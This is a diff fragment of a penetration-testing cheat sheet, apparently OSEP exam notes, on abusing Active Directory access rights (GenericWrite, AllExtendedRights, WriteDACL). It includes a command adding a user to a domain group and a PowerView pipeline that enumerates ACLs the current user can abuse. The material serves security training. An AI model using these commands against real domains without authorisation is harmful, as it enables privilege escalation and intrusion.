peterkhe1999/CheatSheet/OSEP/README.md

 net group testgroup offsec /add /domain
 ```

-As with user accounts, we can also use the **AllExtendedRights** and **GenericWrite** access rights in a similar way.
+As with user accounts, also use the **AllExtendedRights** and **GenericWrite** access rights in a similar way.

 ### Abusing WriteDACL

-All Active Directory objects have a DACL and one object access right in particular (WriteDACL) grants permission to modify the DACL itself.
+All AD objects have a DACL and one object access right in particular (WriteDACL) grants permission to modify the DACL itself.

-Enumerate misconfigured user accounts with Get-DomainUser and Get-ObjectAcl:
+Enumerate misconfigured user accounts

 ```pwsh
 Get-DomainUser | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}}